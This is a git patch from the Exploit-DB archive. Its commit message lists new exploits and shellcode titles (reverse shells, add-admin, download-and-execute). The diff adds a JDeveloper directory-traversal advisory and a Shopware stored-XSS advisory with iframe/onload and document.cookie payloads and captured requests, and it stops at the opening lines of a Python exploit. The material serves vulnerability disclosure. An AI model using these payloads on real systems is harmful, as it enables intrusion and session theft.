From 995a8906f16caa68aa40584199b79bd65a428599 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 22 Jan 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-01-22

27 changes to exploits/shellcodes

Oracle JDeveloper 11.1.x/12.x - Directory Traversal
Shopware 5.2.5/5.3 - Cross-Site Scripting
CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities
PHPFreeChat 1.7 - Denial of Service
OTRS 5.0.x/6.0.x - Remote Command Execution

DarkComet (C2 Server) - File Upload

BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)
BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)
BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)
BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)

FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode
Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode
HP-UX - execve(/bin/sh) Shellcode (58 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode
Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode
HP-UX - execve(/bin/sh) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode
Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)
Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)

Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)
Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)

Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes)

Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)

Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)

Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)

Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)

Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)

Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)
Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)

Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)
Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)

Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)

Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)

Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes)

Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)

Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)

Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 - Create Administrator User (X) Shellcode (304 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc.exe Shellcode (57 bytes)

Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)
Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)

Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
---
 exploits/java/webapps/43848.txt              |  87 +++++
 exploits/json/webapps/43849.txt              | 335 +++++++++++++++++++
 exploits/multiple/webapps/43847.py           |  82 +++++
 exploits/perl/webapps/43853.txt              |  42 +++
 exploits/php/webapps/43850.txt               | 231 +++++++++++++
 exploits/php/webapps/43852.php               |  47 +++
 files_exploits.csv                           |   6 +
 files_shellcodes.csv                         |  88 ++---
 shellcodes/bsdi_x86/{13257.txt => 13257.c}   |   0
 shellcodes/bsdi_x86/{13258.txt => 13258.c}   |   0
 shellcodes/freebsd/{13261.txt => 13261.c}    |   0
 shellcodes/hardware/{13291.txt => 13291.asm} |   0
 shellcodes/hardware/{13292.txt => 13292.asm} |   0
 shellcodes/hardware/{13293.txt => 13293.asm} |   0
 shellcodes/hp-ux/{13295.txt => 13295.c}      |   0
 15 files changed, 874 insertions(+), 44 deletions(-)
 create mode 100644 exploits/java/webapps/43848.txt
 create mode 100644 exploits/json/webapps/43849.txt
 create mode 100755 exploits/multiple/webapps/43847.py
 create mode 100644 exploits/perl/webapps/43853.txt
 create mode 100644 exploits/php/webapps/43850.txt
 create mode 100644 exploits/php/webapps/43852.php
 rename shellcodes/bsdi_x86/{13257.txt => 13257.c} (100%)
 rename shellcodes/bsdi_x86/{13258.txt => 13258.c} (100%)
 rename shellcodes/freebsd/{13261.txt => 13261.c} (100%)
 rename shellcodes/hardware/{13291.txt => 13291.asm} (100%)
 rename shellcodes/hardware/{13292.txt => 13292.asm} (100%)
 rename shellcodes/hardware/{13293.txt => 13293.asm} (100%)
 rename shellcodes/hp-ux/{13295.txt => 13295.c} (100%)

diff --git a/exploits/java/webapps/43848.txt b/exploits/java/webapps/43848.txt
new file mode 100644
index 000000000..fd3a78211
--- /dev/null
+++ b/exploits/java/webapps/43848.txt
@@ -0,0 +1,87 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt
+[+] ISR: apparition security           
+ 
+
+Vendor:
+=============
+www.oracle.com
+
+
+Product:
+===========
+JDeveloper IDE
+
+Oracle JDeveloper is a free integrated development environment that simplifies the development of Java-based
+applications addressing every step of the application lifecycle.
+
+
+
+Vulnerability Type:
+===================
+Directory Traversal
+
+
+
+CVE Reference:
+==============
+CVE-2017-10273
+
+
+
+Security Issue:
+================
+Attackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.
+Later, attackers can potentially request these scripts/files to execute system commands on affected target.
+
+
+Affected versions:
+11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0
+
+
+References:
+============
+http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
+
+
+
+Exploit/POC:
+=============
+1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.
+2) import into JDeveloper
+3) files get moved outside target directories to one of the attackers choosing.
+4) attacker requests the malicious file contained in target directory.
+
+BAM!
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+Low
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: October 14, 2016
+Vendor fixes as part of CPU January 16, 2018
+January 17, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/json/webapps/43849.txt b/exploits/json/webapps/43849.txt
new file mode 100644
index 000000000..6e113bb4c
--- /dev/null
+++ b/exploits/json/webapps/43849.txt
@@ -0,0 +1,335 @@
+Document Title:
+===============
+Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1922
+
+Shopware Security Tracking ID: SW-19834
+
+Security Update: 
+http://community.shopware.com/Downloads_cat_448.html#5.3.4
+http://community.shopware.com/_detail_2035.html
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15374
+
+CVE-ID:
+=======
+CVE-2017-15374
+
+
+Release Date:
+=============
+2017-09-05
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1922
+
+
+Common Vulnerability Scoring System:
+====================================
+4.4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Shopware is a modular online shop system that is since 2004 developed in germany. It is available both as 
+an open source software as well as in commercial editions. The program can be extended in its functions by 
+installing additional plugins. An open API allows third-party systems, such as payment services or ERP 
+systems, to be connected. The system is multi shop capable it can thus be generated within an installation 
+several shops in different domains. A multi-client capability (complete separation of multishops in the 
+administration area) is by default, but can be achieved in the cluster.
+
+(Copy of the Vendor Homepage: https://en.shopware.com/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple stored cross site scripting vulnerability in the official Shopware v5.2.5 & 5.3 CMS.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-10-07: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
+2016-10-08: Vendor Notification (Shopware Security Team)
+2016-**-**: Vendor Response/Feedback (Shopware Security Team)
+2017-**-**: Vendor Fix/Patch (Shopware Service Developer Team)
+2017-09-05: Public Disclosure (Vulnerability Laboratory)
+2017-10-25: Security Acknowledgements (Shopware Developer Team)
+2017-10-25: Security Acknowledgements (Shopware Security Team)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Shopware AG
+Product: Shopware - Content Management System (Web-Application) 5.2.5
+
+Shopware AG
+Product: Shopware - Content Management System (Web-Application) 5.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+The shopware v5.2.5 - v5.3 is vulnerable to cross site scripting in the customer and order section of the content management 
+system backend modules. Remote attackers are able to inject malicious script code to the firstname, lastname or order 
+input fields to provoke a persistent execution in the customer and orders section of the backend. The execution occurs 
+in the shopware administrator backend listing when processing to preview the customers (kunden) or orders (bestellungen).
+The injection can be processed by interaction via user registration or by manipulation of the order information inputs.
+The web issue can be exploited by low privileged user accounts against higher privileged admin- oder moderator-accounts.
+
+The security risk of the bugs are estimated as medium with a cvss (common vulnerability scoring system) count of 4.4. 
+Exploitation of the issue requires a low privileged web-application user account and low or medium user interaction. 
+Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent 
+external redirect to malicious sources and application-side manipulation of affected or connected module context.
+
+Request Method(s):
+[+] POST (Registration)
+[+] POST (Order Item)
+[+] POST (Profile Update)
+
+Vulnerable Input(s):
+[+] Firstname
+[+] Lastname
+[+] Order Name
+
+Affected Module(s):
+[+] Kunden (Customers)
+[+] Bestellungen (Orders)
+
+
+Proof of Concept (PoC):
+=======================
+The cross site vulnerabilities can be exploited by remote attackers with low privileged shopware user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1.  Open the the browser and surf to the target shopware v5.2.5 web-application
+2.  Move to the registration formular
+3.  Include a script code payload with a iframe src onload tag to the firstname, lastname and name parameters
+4.  Submit the request via POST method to register the account
+5.  Move to the inbox and verify via link the account to activate
+Note: Now the payloads are executable saved to the Kunden (Customer) section in the backend
+6.  The administrator visits in the next step the Kunden (Customer) section to preview
+7.  The script code payload executes in the customers list
+8.  As next step the attacker places an order via shop
+Note: The order name manipulation via registration is as well able to execute script code the context
+9.  The administrator visits in the next step the Bestellungen (orders) section to preview 
+10. The script code payload executes in the orders list
+11. Successful reproduce of the both cross site vulnerabilities!
+
+Note: Attackers are able to inject malicious redirects, frames with payloads or other script code tags.
+The basic web validation filter of the shopware content management system does not encode the list context.
+
+
+PoC: Vulnerable Source (Execution in Orders - Bestellungen)
+<tr class="x-grid-row  x-grid-row-alt"><td class=" x-grid-cell x-grid-cell-gridcolumn-1496  
+x-grid-cell-special x-grid-cell-row-checker x-grid-cell-first"><div class="x-grid-cell-inner " 
+style="text-align: left; ;"><div class="x-grid-row-checker">&nbsp;</div></div></td><td class=" 
+x-grid-cell x-grid-cell-gridcolumn-1428   "><div class="x-grid-cell-inner " style="text-align: left; 
+;">20.08.2016 08:34</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1429   
+"><div class="x-grid-cell-inner " style="text-align: left; ;">20044</div></td><td class=" 
+x-grid-cell x-grid-cell-gridcolumn-1430   "><div class="x-grid-cell-inner " style="text-align: left; ;">
+536,80</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1431   "><div class="x-grid-cell-inner " 
+style="text-align: left; ;">&nbsp;</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1432   ">
+<div class="x-grid-cell-inner " style="text-align: left; ;">Rechnung</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1433   "><div class="x-grid-cell-inner " style="text-align: left; ;">Standard Versand</div></td>
+<td class=" x-grid-cell x-grid-cell-gridcolumn-1434   "><div class="x-grid-cell-inner " style="text-align: left; ;">
+Hauptshop Deutsch</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1435   "><div class="x-grid-cell-inner " 
+style="text-align: left; ;">Mar'Da>"<iframe src="evil.source" onload="alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!]" <="" 
+korat="">"<iframe src=evil.source onload=alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!] <</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1436 " ><div  class="x-grid-cell-inner " style="text-align: left; ;"><a href="mailto:mardakorat@cuvox.de" 
+data-qtip="mardakorat@cuvox.de">mardakorat@cuvox.de</a></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1437   
+" ><div  class="x-grid-cell-inner " style="text-align: left; ;">Offen</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1438   " ><div  class="x-grid-cell-inner " style="text-align: left; ;">Offen</div></td>
+<td class=" x-grid-cell x-grid-cell-actioncolumn-1405   x-action-col-cell x-grid-cell-last" >
+<div  class="x-grid-cell-inner " style="text-align: left; ;">
+<img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" 
+class="x-action-col-icon x-action-col-0  sprite-user " data-qtip="Kunde öffnen" data-action="openCustomer"  />
+<img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" 
+class="x-action-col-icon x-action-col-1  sprite-minus-circle-frame " data-qtip="Bestellung löschen" 
+data-action="deleteOrder"  /><img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" 
+class="x-action-col-icon x-action-col-2  sprite-pencil " data-qtip="Zeige Details" data-action="editOrder"  /></div></td></tr>
+<tr class="x-grid-row " ><td class=" x-grid-cell x-grid-cell-gridcolumn-1496  x-grid-cell-special 
+x-grid-cell-row-checker x-grid-cell-first" ><div  class="x-grid-cell-inner " style="text-align: left; ;">
+<div class="x-grid-row-checker">&#160;</div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1428   " >
+<div  class="x-grid-cell-inner " style="text-align: left; ;">19.08.2016 15:50</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1429   " ><div  class="x-grid-cell-inner " style="text-align: left; ;">20051</div></td>
+<td class=" x-grid-cell x-grid-cell-gridcolumn-1430   " ><div  class="x-grid-cell-inner " 
+style="text-align: left; ;">308,75</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1431   " >
+<div  class="x-grid-cell-inner " style="text-align: left; ;">&#160;</div></td>
+
+
+PoC: Vulnerable Source (Execution in Customers - Kunden)
+<div class="x-window x-customer-detail-window x-layer x-window-default x-closable x-window-closable x-window-default-closable" 
+style="left: 124px; top: 26px; width: 1093px; height: 458px; z-index: 39041;" id="customer-detail-window-2311" tabindex="-1">
+<div style="-moz-user-select: none; left: -1px; top: -1px; width: 1093px;" class="x-window-header x-window-header-draggable 
+x-docked x-window-header-default x-horizontal x-window-header-horizontal x-window-header-default-horizontal x-top 
+x-window-header-top x-window-header-default-top x-docked-top x-window-header-docked-top x-window-header-default-docked-top 
+x-unselectable" id="customer-detail-window-2311_header"><div style="width: 1091px;" id="customer-detail-window-2311_header-body" 
+class="x-window-header-body x-window-header-body-default x-window-header-body-horizontal x-window-header-body-default-horizontal 
+x-window-header-body-top x-window-header-body-default-top x-window-header-body-docked-top x-window-header-body-default-docked-top 
+x-window-header-body-default-horizontal x-window-header-body-default-top x-window-header-body-default-docked-top x-box-layout-ct">
+<div style="width: 1066px; height: 154px;" id="customer-detail-window-2311_header-innerCt" class="x-box-inner " 
+role="presentation"><div id="customer-detail-window-2311_header-targetEl" style="position:absolute;width:20000px;
+left:0px;top:0px;height:1px"><div class="x-component x-window-header-text-container x-box-item x-component-default" 
+style="text-align: left; left: 0px; top: 0px; margin: 0px; width: 1049px;" id="customer-detail-window-2311_header_hd">
+<span id="customer-detail-window-2311_header_hd-textEl" class="x-window-header-text x-window-header-text-default">
+Kundenkonto: Mar'Da"><iframe src="evil.source" onload="alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!]" <="" 
+korat"=""><iframe src=evil.source onload=alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!] < (20019)</iframe></span></div>
+<div class="x-tool x-box-item x-tool-default" style="width: 15px; height: 15px; left: 1051px; top: 70px; margin: 0px;" id="tool-2312">
+<img id="tool-2312-toolEl" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" 
+class="x-tool-close" role="presentation"></div></div></div></div>
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://shopware.localhost:8080/backend/customer/save?_dc=1471541475086&customerID=22 
+Mime Type[application/json]
+   Request Header:
+      Host[shopware.localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
+      Content-Type[application/json]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://shopware.localhost:8080/backend/]
+      Cookie[SHOPWAREBACKEND=fv4u2kg63p3ff3ht6kd6var803; test; x-ua-device=desktop; session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
+Connection[keep-alive]
+POST-Daten:
+{"id":22,"groupKey":"EK","email":"TEST@TEST.de","active":true,"accountMode":0,"confirmationKey":
+"","paymentId":5,"firstLogin":"2016-08-18T00:00:00","lastLogin":"2016-08-18T17:22:23","newsletter":0,"validation":0,"
+languageId":1,"shopId":1,"priceGroupId":0,
+"internalComment":"TEST-comment","failedLogins":0,"referer":"","default_billing_address_id":22,"
+default_shipping_address_id":22,
+"newPassword":"","amount":402.9,"orderCount":1,"canceledOrderAmount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"16.05.1985","title":"","
+salutation":"mr","firstname":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","
+lastname":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
+"number":"20028","billing":[{"id":22,"salutation":"mr","company":"","
+department":"","firstName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert
+(document.cookie) <","title":"","lastName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
+"street":"Teststrau00dfe","zipCode":"72202","city":"Nagold","additionalAddressLine1":"","additionalAddressLine2":"",
+"salutationSnippet":"Herr","countryId":2,"number":"","phone":"","vat
+Id":"","stateId":null}],"shipping":[{"id":23,"salutation":"mr","company":"","department":"",
+"firstName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source 
+onload=alert(document.cookie) <","title":"",
+"lastName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
+"street":"Teststrau00dfe","zipCode":"72202","city":"Nagold","additionalAddressLine1":"",
+"additionalAddressLine2":"","salutationSnippet":"Herr","countryId":2,"stateId":null}],"debit":
+[],"paymentData":[{"accountNumber":"","bankCode":"","bankName":"","accountHolder":"","bic":"",
+"iban":"","useBillingData":false,"id":null}]}]
+   Response Header:
+      Server[nginx/1.8.1]
+      Content-Type[application/json]
+      Connection[keep-alive]
+      Set-Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; path=/backend/; HttpOnly]
+-
+Status: 200[OK]
+POST http://shopware.localhost:8080/backend/Log/createLog
+Mime Type
+[application/json]
+   Request Header:
+      Host[shopware.localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
+      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://shopware.localhost:8080/backend/]
+      Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; test; x-ua-device=desktop; 
+	session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
+      Connection[keep-alive]
+   POST-Daten:
+      type[backend]
+      key[Kunden]
+      text[Kunde%2020028%20wurde%20gespeichert]
+      user[Demo-Admin]
+      value4[]
+   Response Header:
+      Server[nginx/1.8.1]
+      Content-Type[application/json]
+      Connection[keep-alive]
+      Set-Cookie[SHOPWAREBACKEND=hmb3lqokn3bkr6kvpo1o6vi4o6; path=/backend/; HttpOnly]
+-
+Status: 200[OK]
+GET http://shopware.localhost:8080/backend/evil.source[PERSISTENT SCRIPT CODE EXECUTE!] 
+Mime Type[text/html]
+   Request Header:
+      Host[shopware.localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
+      Referer[http://shopware.localhost:8080/backend/]
+      Cookie[SHOPWAREBACKEND=p56ursgfdc6f1tbh0s35detvc5; test; x-ua-device=desktop; 
+	session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
+      Connection[keep-alive]
+   Response Header:
+      Server[nginx/1.8.1]
+      Content-Type[text/html; charset=UTF-8]
+      Connection[keep-alive]
+      Set-Cookie[SHOPWAREBACKEND=v3mhes99ai1hsolj8vddjkbci2; path=/backend/; HttpOnly]
+
+
+Reference(s):
+http://shopware.localhost:8080/
+http://shopware.localhost:8080/backend/
+http://shopware.localhost:8080/backend/Log/
+http://shopware.localhost:8080/backend/customer/
+http://shopware.localhost:8080/backend/Log/createLog
+http://shopware.localhost:8080/backend/customer/save
+http://shopware.localhost:8080/backend/AttributeData/
+http://shopware.localhost:8080/backend/AttributeData/list
+
+
+Solution - Fix & Patch:
+=======================
+The xss vulnerability can be patched by a secure parse of the customer (kunden) and orders (bestellungen) context listings.
+Parse or escape the context and disallow special chars during the registration or add to prevent further script code injection attacks.
+
+The vulnerability can be resolved by an update to version 5.3.4 that is delivered by the manufacturer. The issue risk is marked as moderate.
+
+
+
+Security Risk:
+==============
+The security risk of the stored cross site scripting vulnerabilities in the shopware cms are estimated as medium. (CVSS 4.4)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
+implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
+case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
+suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
+or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
+websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
+or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
+phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/43847.py b/exploits/multiple/webapps/43847.py
new file mode 100755
index 000000000..3f743bf19
--- /dev/null
+++ b/exploits/multiple/webapps/43847.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+#
+# EDB Note: Source ~ https://gist.github.com/PseudoLaboratories/260b6f24844785aacc1e2fb61dd05c01/259944bd94a0d289ef80b9138c1e3f97a97aa9cd
+#
+
+from time import sleep
+from socket import socket, AF_INET, SOCK_STREAM, error
+from re import search
+from Crypto.Cipher import ARC4
+from binascii import hexlify, unhexlify
+
+import argparse
+
+def good(text):
+    print('[+] ' + text)
+
+def bad(text):
+    print('[-] ' + text)
+
+def normal(text):
+    print('[*] ' + text)
+
+def decrypt(data, key):
